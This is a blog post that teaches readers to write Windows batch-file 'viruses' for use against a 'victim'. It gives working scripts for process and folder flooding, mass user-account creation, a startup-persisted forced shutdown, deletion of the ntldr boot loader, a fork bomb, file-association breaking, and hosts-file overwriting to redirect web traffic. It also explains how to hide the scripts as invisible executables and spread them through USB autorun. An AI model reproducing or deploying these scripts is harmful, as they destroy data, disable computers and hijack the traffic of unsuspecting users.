Hi friends Rohit Hea again after a long time . I just want to share something that i know
about creatig VIRUS using BATCH FILES. Batch files are type of
executable files with the extention ".bat" . Coming to the point , we
can create malicious and irritating virus just by typing their codes and
saving them as .bat extension.
I could just you give the codes to paste in notepad and ask you to save files with extension .bat and your deadly batch viruses would be ready to attack. But
instead of that, I have just focussed on making the basics of creating batch files clear and developing the approach to code your own viruses.So please just try to understand the code instead of copying it to notepad.
:x //loop variable
start winword
start mspaint //open paint
start notepad
start write
start cmd //open command prompt
start explorer
start control
start calc // open calculator
goto x // infinite loop
When the victim would plug in pen drive,the autorun.inf will launch anything.bat and commands in batch file virus would execute.
Do you like this article? Follow Me on Face book also At Rohit's computer world and join as a member for more interesting tricks and tips. Feel free to ask me ,if you have any doubts. To approach personally copntact my mail address in "about me". Suggest your friends to visit this blog for interesting topics.
THANK YOU for reading . Visit my blog regularly and browse the blog for more interesting things...:-)
I could just you give the codes to paste in notepad and ask you to save files with extension .bat and your deadly batch viruses would be ready to attack. But
instead of that, I have just focussed on making the basics of creating batch files clear and developing the approach to code your own viruses.So please just try to understand the code instead of copying it to notepad.
- What are Batch Files ?
Lets
start with a simple example , Open your command prompt(cmd) and change
your current directory on to 'desktop' by typing 'cd desktop' without
the quotes.
Now type these commands in order
1. md a //makes directory 'a' on desktop
2. cd a // changes current directory to 'a'
3. md b // makes a directory 'b' in directory 'b'
We first make a folder/directory 'a', then enter in folder 'a',then make a folder 'b' in folder 'a' .
Now delete the folder 'a'.
Lets
do the same thing in an other way. Type the same three commands given
above in the notepad and save the file as anything.bat . You can give
any name in place of 'anything'.
Now
simply double click on this batch file and the same job will be done by
the file created using notepad and by using command prompt(cmd) . You
will get a folder with name 'a' on your desktop and another folder with
name 'b' in it. This means the three commands are executed in order,
when we ran the batch file
So
a batch file is nothing but a text containing series of commands which
are executed automatically line by line when the batch file is run.
- What can batch viruses do ?
They
can be used to delete the windows files,format data,steal
information,irritate victim, consume CPU resources to affect
performance,disable firewalls,open ports,modify or destroy registry and
for many more purposes.
Now
lets start with simple codes, Just copy the code to notepad and save it
as anything.bat (here anything means any name youwant to give to your
file but extension must be .bat and save it as 'all files' instead of
text files).
Note:
Type 'help' in command prompt to know about some basic commands and to
know about using a particular command , type 'command_name /?' without
quotes.
1. Application Bomber
@echo off // It instructs to hide the commands when batch files is executed
:x //loop variable
start winword
start mspaint //open paint
start notepad
start write
start cmd //open command prompt
start explorer
start control
start calc // open calculator
goto x // infinite loop
This
code when executed will start opening different applications present
in the system like paint,notepad,command prompt repeatedly(because of
infinite loop), irritating the victim and ofcourse affecting the
performance.
2. Folder flooder
@echo off
:x
md %random% // makes directory or folder.
goto x
Here
%random% is a variable that would generate any positive number
randomly. So this code will start creating folders whose name can be
any random number.
3.User account flooder
@echo off
:x
net user %random% /add //create user account
goto x
This code will start creating windows user accounts whose names could be any random numbers.
3.Shutdown Virus
copy anything.bat “C:\Documents and Settings\Administrator\Start Menu\Programs\Startup”
copy anything.bat “C:\Documents and Settings\All Users\Start Menu\Programs\Startup” //these two commands will copy the batchfile in start up folders (in XP)
shutdown -s -t 00 //this will shutdown the computer in 0 seconds
Note : Files
in Start up folder gets started automatically when windows starts .
You should first two lines of code in every virus code so that it
would copy itself in startup folder. Start up folder path in Windows 7
is C:\Users\sys\AppData\Roaming\Microsoft\Windows\Start
Menu\Programs\Startup
Everytime
when the victim start's the computer, this batch file in start up will
run and shutdown the computer immediately. You will be able to remove
this virus by booting the computer in Safe Mode and deleting the batch
file from Start Up folder.
4. Deleting boot files
Goto C drive in Win XP , Tools->Folder Option->View
Now Uncheck the option 'Hide operating system files' and check option 'Show hidden files and folders'. Click apply
Now you can see the operating system files. There is a one file 'ntldr' which is boot loader used to boot the windows.
Lets make a batch file to
delete this file from victim's computer and the windows will not start then.
attrib -S -R -H C:\ntldr // -S,-R,-H to clear system file attribute, read only attribute , hidden file attribute respectively
del ntldr //delete ntldr file
After
running this batch file , system will not reboot and a normal victim
should definitely install the windows again use his computer.
5. Fork Bomb
%0|%0 //Its percentage zero pipe percentage zero
This
code creates a large number of processes very quickly in order to
saturate the process table of windows. It will just hang the windows .
6. Extension Changer
@echo off
assoc .txt=anything // this command associates extension .txt with filetype anything.
assoc .exe=anything
assoc .jpeg=anything
assoc .png=anything
assoc .mpeg=anything
Every
extension is associated with a filetype like extension ‘.exe’. It is
associated with filetype ‘exe file’. To know these, just type ‘assoc’ in
command prompt.
Above
code changes the association of some extensions to filetype ‘anything’
(means u can write anything) which obviously doesn’t exist. So all exe
(paint,games,command prompt and many more),jpeg,png,mpeg files will not
be able to open properly.
7. DNS Poisoning
There is a file called ‘hosts’
located at c:\windows\system32\drivers\etc. We can place a website and
an IP in front of it. By doing this, we want our web browser to take us
to host located at that IP when that website name would be entered. I
mean request to resolve IP of website is not sent to Domain Name
Server(DNS) if the name of website in hosts file.
The code is:
@echo off
echo xxx.xxx.xxx.xxx www.anything.com > C:\windows\system32\drivers\etc\hosts //this command prints or add xxx.xxx.xxx.xxx. www.anything.com in hosts file.
Replace
xxx.xxx.xxx.xxx and www.anything.com with IP address and website of
your choice. You can take/redirect victim to any host located at
specific IP when he wud try to log on to specific website or u can
simply block any website by entering its name and any invalid IP
address.
Note : Most of the batch viruses are simply undetectable by any anitiviruses
Tip : Coding good viruses just depends on the DOS commands you know and logic you use.
- Limitations of Batch Viruses -:
1.Victim can easily read the commands by opening batch file in notepad.
2.The command prompt screen pops up,it alerts the victim and he can stop it.
To overcome these limitations,we need to convert these batch files into executable files that is exe files.
Download this Batch To Exe coverter from here.Remamber the password is "darktechandhack" .
After
running converter , open the batch file virus , Save as exe file , set
visibility mode 'Invisible application' , than just click on compile
button.
- Spreading batch viruses through pen drive -:
Step 1:
Open notepad and write
[autorun]
open=anything.bat
Icon=anything.ico
Save file as ‘autorun.inf’
Step 2: Put this ‘autorun.inf’ and your actual batch virus ‘anything.bat’ in pendrive .
Do you like this article? Follow Me on Face book also At Rohit's computer world and join as a member for more interesting tricks and tips. Feel free to ask me ,if you have any doubts. To approach personally copntact my mail address in "about me". Suggest your friends to visit this blog for interesting topics.
THANK YOU for reading . Visit my blog regularly and browse the blog for more interesting things...:-)
No comments:
Post a Comment